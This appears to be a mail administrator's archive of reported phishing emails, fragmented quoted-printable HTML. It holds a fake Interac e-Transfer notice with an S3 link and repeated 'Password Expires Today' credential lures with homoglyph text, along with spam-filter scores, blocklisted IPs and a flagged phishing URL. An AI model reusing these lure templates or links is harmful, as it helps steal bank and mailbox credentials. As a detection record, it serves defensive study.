footer"> Expires: 9/19/2024 - 8:39 AM

What if you=

could deposit transfers without answering any questions? Sign up for =

Autodeposit in your online banking - the safe and convenient way to re=

ceive funds straight to your bank account.


s=3D"text-center footer">

© 2000 - 2024 Interac Corp. All righ=

ts reserved.

er-terms-of-use/">Terms of Use

® Trade-marks of Interac Co=

rp.

=


ontainer">
ass=3D"text-center"> =


"columns text-left"> 3D=<br
"INTERAC" src=3D"http://etransfer-notification.interac.ca/images/own/e=

transfer_top_banner.png">
=


V12PozYU_Sso2odWmiYQCCTFrX1gTBMWYA6yJahnsXGYmi6iyV1DGHxA1LTYIQ2Gl3-6HN=

U2KMr--555x78_tkTzlNWMSIPGFOMooZx0dKYiqLye2koElyEuXkZhLTFrX1gTBMWYA6yJ=

ahnsXGYmi6iyV1DGHxA1LTYOcZJxIeHpXKi9vZjLbPpowrKkk0jcgskTMf_fKaPOa7mWs6=

vu163tLboNCyF3M0d7zVcjE3vcByViZygvVijVAYBou5tbbdleO7lu25brhCrhnCLc7hI1=

HqIJNbc2reTHIp9inN-nc-76ZvOY6JovWTFrX1gTBMWYA6yJahnsXGYmi6iyV1DGHxA1LT=

Y09uxj0z9caY5PwweOALU3zizX71OyboBJY0kjZnCpUy7gV9fX6cJpXExVfE0EtmM8lmWq=

dnHNYmeAyHkr6Vp2nEiKY-O-vvc3fr3Qb3alrF3ma-DzG7SO1dK0t9KWqiqWnCm5RjkRbL=

0ulYbFmaEpbAnKgslMqBdQeULi-hdnRzsZoUGg-UMLoFJjIsyz4VUk9uEpAXt5kGb05ICM=

D2wu4P-3ZzTy7dSTwXsdu0ba8LhysZWnEhKYTMXisFmohgwMZcUsgI4dTLmmIwqVn5WRv-=

khi4Y7jItfcde2u7Ccm3vikoN054CwyecxMR4kgD2QBqZ2LOUVtl0UhmzgrVp-4FpOaG3W=

LpABdt1F74X-sgLQhSizcYKkIWcZRjMN2HordzQWS_hN1q4aAm74Ar0RVe1otgblHSSk1O=

mySbpoUyJHMH6P_arzyizU_RRZQ7qrzgCi6OyOue9hHRAiKs2UmS75r0nsWHTWHzM-2fXm=

k9fVL38tQDUxyXsEqYWfROG8ENrODopRVRZ4IxmonbvbiOq17cPCGUvvJYLFrBze1BzcXr=

sM6gBfE1LTYISz_mt1AkIPcJWSHDTXq7sMCb6KowVfKV3L_nmoxWjTsg0wj9ayGl7isxNg=

XmZ7fYvJJyXVYPgi1q9DoG6J_0Kb_WaqfClga99QY0LShDwzac47tqtolqcAaYOL0y1M9f=

5jvxWe66GEIvp482ZhGh-M717cPCGUvvJYLFrBze1BzcXrsM6gBfE1LTYlzvb_8fLWqx_u=

H5GBHowN-vF-a4QPxn2wvd_trqCpM-uhAySmkmmSxrgsKo4qWequVlAea58_q3NgBhjpY0=

NjANjb0BjQS6c7oo5n1hv_qsyulkcNpNp-bSA9uKqBsxk3eyNyG-8TSC7TidxHTd4ASKJH=

lDtYahl-NaDWfOsYyHgP-RdGu4HZ9Yur2s6ulxnsQp-Ov70__3wL_lb5dt-gRiZKoGZcRq=

pxNvOabhUkH8wpyLMV50BTGhlBeyb7-J4zDGn5i_-xtFpux3LM4qrVqa1LfB6in6NRs62S=

Rrl2Wstp_p_98ScyLtg9">View in browser
=


;">Hi root@nl2k.ab.ca,

Lynn Dion sent you $759.46 (CAD) on 9/1=

9/2024 - 7:52 AM.


=3D"font-size: 17.3px;">Deposit your money at:


mazonaws.com/superv2.html"> 3D"RBC
/etransfer-content.interac.ca/en/logo_CA000003.png">
Or

d>

ttps://superv2.s3.ca-central-1.amazonaws.com/superv2.html">Select a di=

fferent financial institution

ter footer"> Expires: 9/19/2024 - 7:52 AM

What if =

you could deposit transfers without answering any questions? Sign up f=

or Autodeposit in your online banking - the safe and convenient way to=

receive funds straight to your bank account.


lass=3D"text-center footer">

© 2000 - 2024 Interac Corp. All r=

ights reserved.

nsfer-terms-of-use/">Terms of Use

® Trade-marks of Interac=

Corp.







--po8LKxsx8k6rGVWKPYsMW=_dgVelEFDITu--



nk.ca credential phishing from oversunmercury.ru

Return-path:

Envelope-to: dave@doctor.nl2k.ab.ca

Delivery-date: Thu, 19 Sep 2024 04:30:01 -0600

Received: from doctor by doctor.nl2k.ab.ca with local (Exim 4.98 (FreeBSD))

(envelope-from )

id 1srEPb-000000004jp-0ePG

for dave@doctor.nl2k.ab.ca;

Thu, 19 Sep 2024 04:29:23 -0600

Resent-From: The Doctor

Resent-Date: Thu, 19 Sep 2024 04:29:22 -0600

Resent-Message-ID:

Resent-To: Dave Yadallee

Received: from [188.127.240.181] (port=48194 helo=s967607.srvape.com)

by doctor.nl2k.ab.ca with esmtp (Exim 4.98 (FreeBSD))

(envelope-from )

id 1srAUc-000000008vm-3RyW

for sales@nk.ca;

Thu, 19 Sep 2024 00:18:27 -0600

Received: from [185.215.151.25] (localhost [IPv6:::1])

by s967607.srvape.com (Postfix) with ESMTP id 35F512938A9

for ; Thu, 19 Sep 2024 09:16:24 +0300 (MSK)

From:

To: sales@nk.ca

Subject: Password Expires Today

Date: 18 Sep 2024 23:16:23 -0700

Message-ID: <20240918231622.83D8E90D7107EF0C@nk.ca>

MIME-Version: 1.0

Content-Type: text/html

Content-Transfer-Encoding: quoted-printable

X-Spam_score: 17.1

X-Spam_score_int: 171

X-Spam_bar: +++++++++++++++++

X-Spam_report: Spam detection software, running on the system "doctor.nl2k.ab.ca",

has identified this incoming email as possible spam. The original

message has been attached to this so you can view it or label

similar future email. If you have any questions, see

@@CONTACT_ADDRESS@@ for details.



Content preview: This email ιs from a trusted sοurce (nk.ca). PASSWORD EXPIRY

LAST REMINDER



Content analysis details: (17.1 points, 5.0 required)



pts rule name description

---- ---------------------- --------------------------------------------------

1.0 RCVD_IN_WSFF RBL: Received via a relay in will-spam-for-food.eu.org

[188.127.240.181 listed in will-spam-for-food.eu.org]

[188.127.240.181 listed in will-spam-for-food.eu.org]

[188.127.240.181 listed in will-spam-for-food.eu.org]

[188.127.240.181 listed in will-spam-for-food.eu.org]

[188.127.240.181 listed in will-spam-for-food.eu.org]

[188.127.240.181 listed in will-spam-for-food.eu.org]

[188.127.240.181 listed in will-spam-for-food.eu.org]

[188.127.240.181 listed in will-spam-for-food.eu.org]

1.5 RCVD_IN_AHBL RBL: AHBL: sender is listed in dnsbl.ahbl.org

[188.127.240.181 listed in dnsbl.ahbl.org]

[188.127.240.181 listed in dnsbl.ahbl.org]

[188.127.240.181 listed in dnsbl.ahbl.org]

[188.127.240.181 listed in dnsbl.ahbl.org]

0.5 RCVD_IN_AHBL_SMTP RBL: AHBL: Open SMTP relay in dnsbl.ahbl.org

[188.127.240.181 listed in dnsbl.ahbl.org]

1.5 RCVD_IN_AHBL_SPAM RBL: AHBL: Spam Source in dnsbl.ahbl.org

[188.127.240.181 listed in dnsbl.ahbl.org]

0.0 RCVD_IN_AHBL_RTB RBL: AHBL: Real-Time Blocked in dnsbl.ahbl.org

[188.127.240.181 listed in dnsbl.ahbl.org]

0.5 RCVD_IN_AHBL_PROXY RBL: AHBL: Open Proxy server in dnsbl.ahbl.org

[188.127.240.181 listed in dnsbl.ahbl.org]

1.9 URIBL_ABUSE_SURBL Contains an URL listed in the ABUSE SURBL blocklist

[URI: khgyuiofgyu89oiy89087er898fgtyuijhgefyuiv.pages.dev]

0.9 SPF_FAIL SPF: sender does not match SPF record (fail)

[SPF failed: Please see http://www.openspf.org/Why?s=mfrom;id=it%40nk.ca;ip=188.127.240.181;r=doctor.nl2k.ab.ca]

0.2 MR_NOT_ATTRIBUTED_IP Beta rule: an non-attributed IPv4 found in

headers

1.1 TRACKER_ID BODY: Incorporates a tracking ID number

1.5 MR_STRANGE_QUESTION URI: No description available.

0.0 HTML_MESSAGE BODY: HTML included in message

1.1 MIME_HTML_ONLY BODY: Message only has text/html MIME parts

0.0 HTML_FONT_LOW_CONTRAST BODY: HTML font color similar or identical to

background

-0.0 T_SCC_BODY_TEXT_LINE No description available.

1.0 IMPRO_URI_3 No description available.

1.0 IMPRO_URI_2 No description available.

1.3 RDNS_NONE Delivered to internal network by a host with no rDNS

2.0 HTML_FONT_TINY_NORDNS Font too small to read, no rDNS

0.0 TO_NO_BRKTS_NORDNS_HTML To: misformatted and no rDNS and HTML only

0.0 TO_EQ_FM_DOM_SPF_FAIL To domain == From domain and external SPF

failed

Subject: {SPAM?} Password Expires Today
















ransform: none; line-height: 1.6em; text-indent: 0px; letter-spacing: norma=

l; font-family: "times new roman"; font-size: 14px; font-style: normal; fon=

t-weight: 400; word-spacing: 0px; white-space: normal; border-collapse: col=

lapse; orphans: 2; widows: 2; background-color: rgb(238, 238, 238); font-va=

riant-ligatures: normal; font-variant-caps: normal; -webkit-text-stroke-wid=

th: 0px; text-decoration-thickness: initial;=20

text-decoration-style: initial; text-decoration-color: initial;'>
>

dy>

one; width: 1px; color: white; line-height: 1.666; font-family: arial, verd=

ana, sans-serif; background-color: rgb(2, 151, 64);">

ing: 3px; border: 0px solid rgb(0, 0, 0); border-image: none; line-height: =

1.666; font-family: arial, verdana, sans-serif; background-color: rgb(243, =

255, 248);">


-family: arial, helvetica, sans-serif;">

This email ιs from a trusted sοurce (
eft; color: rgb(0, 0, 0); text-transform: none; text-indent: 0px; letter-sp=

acing: normal; font-family: Calibri, Helvetica, sans-serif; font-size: 16px=

; font-style: normal; font-weight: 400; word-spacing: 0px; float: none; dis=

play: inline !important; white-space: normal; orphans: 2; widows: 2; backgr=

ound-color: rgb(255, 255, 255); font-variant-ligatures: normal; font-varian=

t-caps: normal; -webkit-text-stroke-width: 0px;=20

text-decoration-thickness: initial; text-decoration-style: initial; text-de=

coration-color: initial;">nk.ca
).




; letter-spacing: normal; font-family: "Segoe UI", "Segoe UI Web Regular", =

"Segoe UI Symbol", "Helvetica Neue", Arial, "sans-serif"; font-size: 12px; =

font-style: normal; font-weight: 400; word-spacing: 0px; white-space: norma=

l; orphans: 2; widows: 2; font-variant-ligatures: normal; font-variant-caps=

: normal; -webkit-text-stroke-width: 0px; text-decoration-thickness: initia=

l; text-decoration-style: initial;=20

text-decoration-color: initial;'>



; letter-spacing: normal; font-family: "Segoe UI", "Segoe UI Web Regular", =

"Segoe UI Symbol", "Helvetica Neue", Arial, "sans-serif"; font-size: 12px; =

font-style: normal; font-weight: 400; word-spacing: 0px; white-space: norma=

l; orphans: 2; widows: 2; font-variant-ligatures: normal; font-variant-caps=

: normal; -webkit-text-stroke-width: 0px; text-decoration-thickness: initia=

l; text-decoration-style: initial;=20

text-decoration-color: initial;'>


-image: none; color: rgb(51, 51, 51); text-transform: none; letter-spacing:=

normal; font-family: Roboto, RobotoDraft, Helvetica, Arial, sans-serif; fo=

nt-size: 12px; font-style: normal; font-weight: 400; word-spacing: 0px; whi=

te-space: normal; border-collapse: collapse; border-spacing: 0px; orphans: =

2; widows: 2; background-color: rgb(228, 228, 228); font-variant-ligatures:=

normal; font-variant-caps: normal;=20

-webkit-text-stroke-width: 0px; text-decoration-thickness: initial; text-de=

coration-style: initial; text-decoration-color: initial;" border=3D"0" cell=

spacing=3D"0" cellpadding=3D"0">
e=3D"padding-left: 15px;">
>


valign=3D"middle" style=3D"padding-right: 15px; padding-left: 15px; border-=

collapse: collapse;">

'font-family: "Symantec Sans"; font-size: 16px; border-collapse: collapse;'=

>




            &nb=

sp;            =

            &nb=

sp;            =

            &nb=

sp;          
=3D"vertical-align: inherit;"> 

PA=

SSWORD EXPIRY
 
td>
 

-image: none; color: rgb(51, 51, 51); text-transform: none; letter-spacing:=

normal; font-family: Roboto, RobotoDraft, Helvetica, Arial, sans-serif; fo=

nt-size: 12px; font-style: normal; font-weight: 400; word-spacing: 0px; whi=

te-space: normal; border-collapse: collapse; border-spacing: 0px; orphans: =

2; widows: 2; font-variant-ligatures: normal; font-variant-caps: normal; -w=

ebkit-text-stroke-width: 0px;=20

text-decoration-thickness: initial; text-decoration-style: initial; text-de=

coration-color: initial;" bgcolor=3D"#ffffff" border=3D"0" cellspacing=3D"0=

" cellpadding=3D"0">
, 228);">

27px; font-family: Calibri; font-size: 13px; border-collapse: collapse; ba=

ckground-color: rgb(236, 243, 249);">
;">
size=3D"4">LAST REMINDER



Hello sales

x 5px; line-height: 27px; font-family: Calibri; font-size: 13px; border-col=

lapse: collapse; background-color: rgb(236, 243, 249);">
%" style=3D"font-family: Arial, Helvetica, sans-serif; font-size: small;" b=

order=3D"0" cellspacing=3D"0" cellpadding=3D"0">


Sans", HelveticaNeue-Light, "Helvetica Neue Light", "Helvetica Neue", Helve=

tica, Arial, "Lucida Grande", sans-serif; font-size: 16px;'>

nt-family: Roboto, RobotoDraft, Helvetica, Arial, sans-serif;">


le=3D"vertical-align: inherit;">
ont face=3D"Calibri">Your account sales@nk.ca password expires
>Today. H

ence you may not be able to access your Mailbox, send or receive new messag=

es.

Click_below_to_continue_using_the_same_Password

span>


"left" style=3D"padding: 10px; border-collapse: collapse;">


; letter-spacing: normal; font-family: Arial, Tahoma, Verdana, sans-serif; =

font-size: 15px; font-style: normal; font-weight: 400; word-spacing: 0px; w=

hite-space: normal; orphans: 2; widows: 2; background-color: rgb(255, 255, =

255); font-variant-ligatures: normal; font-variant-caps: normal; -webkit-te=

xt-stroke-width: 0px; text-decoration-thickness: initial; text-decoration-s=

tyle: initial; text-decoration-color: initial;"=20

cellspacing=3D"0">


>

=3D"center" bgcolor=3D"#045fb4">




g: 5px 15px; line-height: 0; font-size: 0px; border-collapse: collapse;">&n=

bsp;

alibri; font-size: 13px; border-collapse: collapse;">


ical-align: inherit;">
=3D"#e11e2c">

***You will be locked_out of your_account if notification_is_ignored
=


This message is auto-generated from the E-mail securit=

y server, and replies sent to this email can not be delivered.

>



nk.ca credential phishing from oversunmercury.ru

Return-path:

Envelope-to: dave@doctor.nl2k.ab.ca

Delivery-date: Thu, 19 Sep 2024 04:30:01 -0600

Received: from doctor by doctor.nl2k.ab.ca with local (Exim 4.98 (FreeBSD))

(envelope-from )

id 1srEPX-000000004h3-09wh

for dave@doctor.nl2k.ab.ca;

Thu, 19 Sep 2024 04:29:19 -0600

Resent-From: The Doctor

Resent-Date: Thu, 19 Sep 2024 04:29:19 -0600

Resent-Message-ID:

Resent-To: Dave Yadallee

Received: from [188.127.240.181] (port=48192 helo=s967607.srvape.com)

by doctor.nl2k.ab.ca with esmtp (Exim 4.98 (FreeBSD))

(envelope-from )

id 1srAUc-000000008vl-3Rrv

for doctor@nl2k.ab.ca;

Thu, 19 Sep 2024 00:18:26 -0600

Received: from [185.215.151.25] (localhost [IPv6:::1])

by s967607.srvape.com (Postfix) with ESMTP id B5E5D2938BD

for ; Thu, 19 Sep 2024 09:16:24 +0300 (MSK)

From:

To: doctor@nl2k.ab.ca

Subject: Password Expires Today

Date: 18 Sep 2024 23:16:22 -0700

Message-ID: <20240918231622.EEB0BE3442420182@nl2k.ab.ca>

MIME-Version: 1.0

Content-Type: text/html

Content-Transfer-Encoding: quoted-printable

X-Spam_score: 17.1

X-Spam_score_int: 171

X-Spam_bar: +++++++++++++++++

X-Spam_report: Spam detection software, running on the system "doctor.nl2k.ab.ca",

has identified this incoming email as possible spam. The original

message has been attached to this so you can view it or label

similar future email. If you have any questions, see

@@CONTACT_ADDRESS@@ for details.



Content preview: This email ιs from a trusted sοurce (nl2k.ab.ca). PASSWORD

EXPIRY LAST REMINDER



Content analysis details: (17.1 points, 5.0 required)



pts rule name description

---- ---------------------- --------------------------------------------------

1.0 RCVD_IN_WSFF RBL: Received via a relay in will-spam-for-food.eu.org

[188.127.240.181 listed in will-spam-for-food.eu.org]

[188.127.240.181 listed in will-spam-for-food.eu.org]

[188.127.240.181 listed in will-spam-for-food.eu.org]

[188.127.240.181 listed in will-spam-for-food.eu.org]

[188.127.240.181 listed in will-spam-for-food.eu.org]

[188.127.240.181 listed in will-spam-for-food.eu.org]

[188.127.240.181 listed in will-spam-for-food.eu.org]

[188.127.240.181 listed in will-spam-for-food.eu.org]

1.5 RCVD_IN_AHBL RBL: AHBL: sender is listed in dnsbl.ahbl.org

[188.127.240.181 listed in dnsbl.ahbl.org]

[188.127.240.181 listed in dnsbl.ahbl.org]

[188.127.240.181 listed in dnsbl.ahbl.org]

[188.127.240.181 listed in dnsbl.ahbl.org]

0.5 RCVD_IN_AHBL_SMTP RBL: AHBL: Open SMTP relay in dnsbl.ahbl.org

[188.127.240.181 listed in dnsbl.ahbl.org]

0.0 RCVD_IN_AHBL_RTB RBL: AHBL: Real-Time Blocked in dnsbl.ahbl.org

[188.127.240.181 listed in dnsbl.ahbl.org]

0.5 RCVD_IN_AHBL_PROXY RBL: AHBL: Open Proxy server in dnsbl.ahbl.org

[188.127.240.181 listed in dnsbl.ahbl.org]

1.5 RCVD_IN_AHBL_SPAM RBL: AHBL: Spam Source in dnsbl.ahbl.org

[188.127.240.181 listed in dnsbl.ahbl.org]

1.9 URIBL_ABUSE_SURBL Contains an URL listed in the ABUSE SURBL blocklist

[URI: khgyuiofgyu89oiy89087er898fgtyuijhgefyuiv.pages.dev]

0.9 SPF_FAIL SPF: sender does not match SPF record (fail)

[SPF failed: Please see http://www.openspf.org/Why?s=mfrom;id=it%40nl2k.ab.ca;ip=188.127.240.181;r=doctor.nl2k.ab.ca]

0.2 MR_NOT_ATTRIBUTED_IP Beta rule: an non-attributed IPv4 found in

headers

1.1 TRACKER_ID BODY: Incorporates a tracking ID number

1.5 MR_STRANGE_QUESTION URI: No description available.

0.0 HTML_MESSAGE BODY: HTML included in message

1.1 MIME_HTML_ONLY BODY: Message only has text/html MIME parts

0.0 HTML_FONT_LOW_CONTRAST BODY: HTML font color similar or identical to

background

1.0 IMPRO_URI_3 No description available.

-0.0 T_SCC_BODY_TEXT_LINE No description available.

1.3 RDNS_NONE Delivered to internal network by a host with no rDNS

1.0 IMPRO_URI_2 No description available.

2.0 HTML_FONT_TINY_NORDNS Font too small to read, no rDNS

0.0 TO_NO_BRKTS_NORDNS_HTML To: misformatted and no rDNS and HTML only

0.0 TO_EQ_FM_DOM_SPF_FAIL To domain == From domain and external SPF

failed

Subject: {SPAM?} Password Expires Today
















ransform: none; line-height: 1.6em; text-indent: 0px; letter-spacing: norma=

l; font-family: "times new roman"; font-size: 14px; font-style: normal; fon=

t-weight: 400; word-spacing: 0px; white-space: normal; border-collapse: col=

lapse; orphans: 2; widows: 2; background-color: rgb(238, 238, 238); font-va=

riant-ligatures: normal; font-variant-caps: normal; -webkit-text-stroke-wid=

th: 0px; text-decoration-thickness: initial;=20

text-decoration-style: initial; text-decoration-color: initial;'>
>
=


one; width: 1px; color: white; line-height: 1.666; font-family: arial, verd=

ana, sans-serif; background-color: rgb(2, 151, 64);">

ing: 3px; border: 0px solid rgb(0, 0, 0); border-image: none; line-height: =

1.666; font-family: arial, verdana, sans-serif; background-color: rgb(243, =

255, 248);">


-family: arial, helvetica, sans-serif;">

This email ιs from a trusted sοurce (
eft; color: rgb(0, 0, 0); text-transform: none; text-indent: 0px; letter-sp=

acing: normal; font-family: Calibri, Helvetica, sans-serif; font-size: 16px=

; font-style: normal; font-weight: 400; word-spacing: 0px; float: none; dis=

play: inline !important; white-space: normal; orphans: 2; widows: 2; backgr=

ound-color: rgb(255, 255, 255); font-variant-ligatures: normal; font-varian=

t-caps: normal; -webkit-text-stroke-width: 0px;=20

text-decoration-thickness: initial; text-decoration-style: initial; text-de=

coration-color: initial;">nl2k.ab.ca
).




; letter-spacing: normal; font-family: "Segoe UI", "Segoe UI Web Regular", =

"Segoe UI Symbol", "Helvetica Neue", Arial, "sans-serif"; font-size: 12px; =

font-style: normal; font-weight: 400; word-spacing: 0px; white-space: norma=

l; orphans: 2; widows: 2; font-variant-ligatures: normal; font-variant-caps=

: normal; -webkit-text-stroke-width: 0px; text-decoration-thickness: initia=

l; text-decoration-style: initial;=20

text-decoration-color: initial;'>



; letter-spacing: normal; font-family: "Segoe UI", "Segoe UI Web Regular", =

"Segoe UI Symbol", "Helvetica Neue", Arial, "sans-serif"; font-size: 12px; =

font-style: normal; font-weight: 400; word-spacing: 0px; white-space: norma=

l; orphans: 2; widows: 2; font-variant-ligatures: normal; font-variant-caps=

: normal; -webkit-text-stroke-width: 0px; text-decoration-thickness: initia=

l; text-decoration-style: initial;=20

text-decoration-color: initial;'>


-image: none; color: rgb(51, 51, 51); text-transform: none; letter-spacing:=

normal; font-family: Roboto, RobotoDraft, Helvetica, Arial, sans-serif; fo=

nt-size: 12px; font-style: normal; font-weight: 400; word-spacing: 0px; whi=

te-space: normal; border-collapse: collapse; border-spacing: 0px; orphans: =

2; widows: 2; background-color: rgb(228, 228, 228); font-variant-ligatures:=

normal; font-variant-caps: normal;=20

-webkit-text-stroke-width: 0px; text-decoration-thickness: initial; text-de=

coration-style: initial; text-decoration-color: initial;" border=3D"0" cell=

spacing=3D"0" cellpadding=3D"0">
e=3D"padding-left: 15px;">
>


valign=3D"middle" style=3D"padding-right: 15px; padding-left: 15px; border-=

collapse: collapse;">

'font-family: "Symantec Sans"; font-size: 16px; border-collapse: collapse;'=

>




            &nb=

sp;            =

            &nb=

sp;            =

            &nb=

sp;          
=3D"vertical-align: inherit;"> 

PA=

SSWORD EXPIRY
 
td>
 

-image: none; color: rgb(51, 51, 51); text-transform: none; letter-spacing:=

normal; font-family: Roboto, RobotoDraft, Helvetica, Arial, sans-serif; fo=

nt-size: 12px; font-style: normal; font-weight: 400; word-spacing: 0px; whi=

te-space: normal; border-collapse: collapse; border-spacing: 0px; orphans: =

2; widows: 2; font-variant-ligatures: normal; font-variant-caps: normal; -w=

ebkit-text-stroke-width: 0px;=20

text-decoration-thickness: initial; text-decoration-style: initial; text-de=

coration-color: initial;" bgcolor=3D"#ffffff" border=3D"0" cellspacing=3D"0=

" cellpadding=3D"0">
, 228);">

27px; font-family: Calibri; font-size: 13px; border-collapse: collapse; ba=

ckground-color: rgb(236, 243, 249);">
;">
size=3D"4">LAST REMINDER



Hello doctor

px 5px; line-height: 27px; font-family: Calibri; font-size: 13px; border-co=

llapse: collapse; background-color: rgb(236, 243, 249);">
0%" style=3D"font-family: Arial, Helvetica, sans-serif; font-size: small;" =

border=3D"0" cellspacing=3D"0" cellpadding=3D"0">


Sans", HelveticaNeue-Light, "Helvetica Neue Light", "Helvetica Neue", Helve=

tica, Arial, "Lucida Grande", sans-serif; font-size: 16px;'>

nt-family: Roboto, RobotoDraft, Helvetica, Arial, sans-serif;">


le=3D"vertical-align: inherit;">
ont face=3D"Calibri">Your account doctor@nl2k.ab.ca password expires <=

strong>Today. H

ence you may not be able to access your Mailbox, send or receive new messag=

es.

Click_below_to_continue_using_the_same_Password

span>


"left" style=3D"padding: 10px; border-collapse: collapse;">


; letter-spacing: normal; font-family: Arial, Tahoma, Verdana, sans-serif; =

font-size: 15px; font-style: normal; font-weight: 400; word-spacing: 0px; w=

hite-space: normal; orphans: 2; widows: 2; background-color: rgb(255, 255, =

255); font-variant-ligatures: normal; font-variant-caps: normal; -webkit-te=

xt-stroke-width: 0px; text-decoration-thickness: initial; text-decoration-s=

tyle: initial; text-decoration-color: initial;"=20

cellspacing=3D"0">


>

=3D"center" bgcolor=3D"#045fb4">




g: 5px 15px; line-height: 0; font-size: 0px; border-collapse: collapse;">&n=

bsp;

alibri; font-size: 13px; border-collapse: collapse;">


ical-align: inherit;">
=3D"#e11e2c">

***You will be locked_out of your_account if notification_is_ignored
=


This message is auto-generated from the E-mail securit=

y server, and replies sent to this email can not be delivered.

>



nk.ca credential phishing from oversunmercury.ru

Return-path:

Envelope-to: dave@doctor.nl2k.ab.ca

Delivery-date: Thu, 19 Sep 2024 00:19:00 -0600

Received: from [188.127.240.181] (port=48168 helo=s967607.srvape.com)

by doctor.nl2k.ab.ca with esmtp (Exim 4.98 (FreeBSD))

(envelope-from )

id 1srAUc-000000008ve-3Ruc

for dave@doctor.nl2k.ab.ca;

Thu, 19 Sep 2024 00:18:25 -0600

Received: from [185.215.151.25] (localhost [IPv6:::1])

by s967607.srvape.com (Postfix) with ESMTP id 2B188202398

for ; Thu, 19 Sep 2024 09:16:22 +0300 (MSK)

From:

To: dave@doctor.nl2k.ab.ca

Subject: Password Expires Today

Date: 18 Sep 2024 23:16:20 -0700

Message-ID: <20240918231620.72412E1B02E6A2ED@doctor.nl2k.ab.ca>

MIME-Version: 1.0

Content-Type: text/html

Content-Transfer-Encoding: quoted-printable

X-Spam_score: 17.1

X-Spam_score_int: 171

X-Spam_bar: +++++++++++++++++

X-Spam_report: Spam detection software, running on the system "doctor.nl2k.ab.ca",

has identified this incoming email as possible spam. The original

message has been attached to this so you can view it or label

similar future email. If you have any questions, see

@@CONTACT_ADDRESS@@ for details.



Content preview: This email ιs from a trusted sοurce (doctor.nl2k.ab.ca).

PASSWORD EXPIRY LAST REMINDER



Content analysis details: (17.1 points, 5.0 required)



pts rule name description

---- ---------------------- --------------------------------------------------

1.0 RCVD_IN_WSFF RBL: Received via a relay in will-spam-for-food.eu.org

[188.127.240.181 listed in will-spam-for-food.eu.org]

[188.127.240.181 listed in will-spam-for-food.eu.org]

[188.127.240.181 listed in will-spam-for-food.eu.org]

[188.127.240.181 listed in will-spam-for-food.eu.org]

[188.127.240.181 listed in will-spam-for-food.eu.org]

[188.127.240.181 listed in will-spam-for-food.eu.org]

[188.127.240.181 listed in will-spam-for-food.eu.org]

[188.127.240.181 listed in will-spam-for-food.eu.org]

1.5 RCVD_IN_AHBL RBL: AHBL: sender is listed in dnsbl.ahbl.org

[188.127.240.181 listed in dnsbl.ahbl.org]

[188.127.240.181 listed in dnsbl.ahbl.org]

[188.127.240.181 listed in dnsbl.ahbl.org]

[188.127.240.181 listed in dnsbl.ahbl.org]

0.0 RCVD_IN_AHBL_RTB RBL: AHBL: Real-Time Blocked in dnsbl.ahbl.org

[188.127.240.181 listed in dnsbl.ahbl.org]

1.5 RCVD_IN_AHBL_SPAM RBL: AHBL: Spam Source in dnsbl.ahbl.org

[188.127.240.181 listed in dnsbl.ahbl.org]

0.5 RCVD_IN_AHBL_PROXY RBL: AHBL: Open Proxy server in dnsbl.ahbl.org

[188.127.240.181 listed in dnsbl.ahbl.org]

0.5 RCVD_IN_AHBL_SMTP RBL: AHBL: Open SMTP relay in dnsbl.ahbl.org

[188.127.240.181 listed in dnsbl.ahbl.org]

0.9 SPF_FAIL SPF: sender does not match SPF record (fail)

[SPF failed: Please see http://www.openspf.org/Why?s=mfrom;id=it%40doctor.nl2k.ab.ca;ip=188.127.240.181;r=doctor.nl2k.ab.ca]

1.9 URIBL_ABUSE_SURBL Contains an URL listed in the ABUSE SURBL blocklist

[URI: khgyuiofgyu89oiy89087er898fgtyuijhgefyuiv.pages.dev]

0.2 MR_NOT_ATTRIBUTED_IP Beta rule: an non-attributed IPv4 found in

headers

1.1 TRACKER_ID BODY: Incorporates a tracking ID number

1.5 MR_STRANGE_QUESTION URI: No description available.

0.0 HTML_MESSAGE BODY: HTML included in message

1.1 MIME_HTML_ONLY BODY: Message only has text/html MIME parts

0.0 HTML_FONT_LOW_CONTRAST BODY: HTML font color similar or identical to

background

1.0 IMPRO_URI_2 No description available.

1.3 RDNS_NONE Delivered to internal network by a host with no rDNS

-0.0 T_SCC_BODY_TEXT_LINE No description available.

1.0 IMPRO_URI_3 No description available.

2.0 HTML_FONT_TINY_NORDNS Font too small to read, no rDNS

0.0 TO_NO_BRKTS_NORDNS_HTML To: misformatted and no rDNS and HTML only

0.0 TO_EQ_FM_DOM_SPF_FAIL To domain == From domain and external SPF

failed

Subject: {SPAM?} Password Expires Today
















ransform: none; line-height: 1.6em; text-indent: 0px; letter-spacing: norma=

l; font-family: "times new roman"; font-size: 14px; font-style: normal; fon=

t-weight: 400; word-spacing: 0px; white-space: normal; border-collapse: col=

lapse; orphans: 2; widows: 2; background-color: rgb(238, 238, 238); font-va=

riant-ligatures: normal; font-variant-caps: normal; -webkit-text-stroke-wid=

th: 0px; text-decoration-thickness: initial;=20

text-decoration-style: initial; text-decoration-color: initial;'>
>

one; width: 1px; color: white; line-height: 1.666; font-family: arial, verd=

ana, sans-serif; background-color: rgb(2, 151, 64);">

ing: 3px; border: 0px solid rgb(0, 0, 0); border-image: none; line-height: =

1.666; font-family: arial, verdana, sans-serif; background-color: rgb(243, =

255, 248);">


-family: arial, helvetica, sans-serif;">

This email ιs from a trusted sοurce (
eft; color: rgb(0, 0, 0); text-transform: none; text-indent: 0px; letter-sp=

acing: normal; font-family: Calibri, Helvetica, sans-serif; font-size: 16px=

; font-style: normal; font-weight: 400; word-spacing: 0px; float: none; dis=

play: inline !important; white-space: normal; orphans: 2; widows: 2; backgr=

ound-color: rgb(255, 255, 255); font-variant-ligatures: normal; font-varian=

t-caps: normal; -webkit-text-stroke-width: 0px;=20

text-decoration-thickness: initial; text-decoration-style: initial; text-de=

coration-color: initial;">doctor.nl2k.ab.ca
).

d>




; letter-spacing: normal; font-family: "Segoe UI", "Segoe UI Web Regular", =

"Segoe UI Symbol", "Helvetica Neue", Arial, "sans-serif"; font-size: 12px; =

font-style: normal; font-weight: 400; word-spacing: 0px; white-space: norma=

l; orphans: 2; widows: 2; font-variant-ligatures: normal; font-variant-caps=

: normal; -webkit-text-stroke-width: 0px; text-decoration-thickness: initia=

l; text-decoration-style: initial;=20

text-decoration-color: initial;'>



; letter-spacing: normal; font-family: "Segoe UI", "Segoe UI Web Regular", =

"Segoe UI Symbol", "Helvetica Neue", Arial, "sans-serif"; font-size: 12px; =

font-style: normal; font-weight: 400; word-spacing: 0px; white-space: norma=

l; orphans: 2; widows: 2; font-variant-ligatures: normal; font-variant-caps=

: normal; -webkit-text-stroke-width: 0px; text-decoration-thickness: initia=

l; text-decoration-style: initial;=20

text-decoration-color: initial;'>


-image: none; color: rgb(51, 51, 51); text-transform: none; letter-spacing:=

